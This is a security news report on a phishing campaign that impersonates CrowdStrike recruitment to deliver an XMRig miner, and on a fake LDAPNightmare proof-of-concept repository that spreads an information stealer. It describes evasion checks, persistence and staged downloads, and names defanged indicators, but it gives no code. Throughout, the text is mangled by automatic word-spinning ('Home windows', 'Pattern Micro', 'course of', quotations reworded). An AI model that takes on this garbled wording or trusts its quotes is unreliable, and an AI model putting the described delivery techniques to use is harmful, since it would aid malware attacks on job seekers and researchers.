Cybersecurity firm CrowdStrike is alerting of a phishing marketing campaign that exploits its personal branding to distribute a cryptocurrency miner that is disguised as an worker CRM software as a part of a supposed recruitment course of.
“The attack begins with a phishing email impersonating CrowdStrike recruitment, directing recipients to a malicious website,” the corporate stated. “Victims are prompted to download and run a fake application, which serves as a downloader for the cryptominer XMRig.”
The Texas-based firm stated it found the malicious marketing campaign on January 7, 2025, and that it is “aware of scams involving false offers of employment with CrowdStrike.”
The phishing electronic mail lures recipients by claiming that they’ve been shortlisted for the following stage of the hiring course of for a junior developer position, and that they should be a part of a name with the recruitment crew by downloading a buyer relationship administration (CRM) software offered within the embedded hyperlink.
The downloaded binary, as soon as launched, performs a sequence of checks to evade detection and evaluation previous to fetching the next-stage payloads.
These checks embody detecting the presence of a debugger and scanning the record of operating processes for malware evaluation or virtualization software program instruments. In addition they be certain that the system has a sure variety of energetic processes and the CPU has not less than two cores.
Ought to the host fulfill all the standards, an error message a few failed set up is exhibited to the consumer, whereas covertly downloading the XMRig miner from GitHub and its corresponding configuration from one other server (“93.115.172[.]41”) within the background.
“The malware then runs the XMRig miner, using the command-line arguments inside the downloaded configuration text file,” CrowdStrike stated, including the executable establishes persistence on the machine by including a Home windows batch script to the Begin Menu Startup folder, which is chargeable for launching the miner.
Pretend LDAPNightmare PoC Targets Safety Researchers
The event comes as Pattern Micro revealed {that a} pretend proof-of-concept (PoC) for a not too long ago disclosed safety flaw in Microsoft’s Home windows Light-weight Listing Entry Protocol (LDAP) – CVE-2024-49113 (aka LDAPNightmare) – is getting used to lure safety researchers into downloading an info stealer.”
The malicious GitHub repository in query – github[.]com/YoonJae-rep/CVE-2024-49113 (now taken down) – is alleged to be a fork of the authentic repository from SafeBreach Labs internet hosting the authentic PoC.
The counterfeit repository, nevertheless, replaces the exploit-related recordsdata with a binary named “poc.exe” that, when run, drops a PowerShell script to create a scheduled process to execute a Base64-encoded script. The decoded script is then used to obtain one other script from Pastebin.
The ultimate-stage malware is a stealer that collects the machine’s public IP deal with, system metadata, course of record, listing lists, community IP addresses, community adapters, and put in updates.
“Although the tactic of using PoC lures as a vehicle for malware delivery is not new, this attack still poses significant concerns, especially since it capitalizes on a trending issue that could potentially affect a larger number of victims,” safety researcher Sarah Pearl Camiling stated.
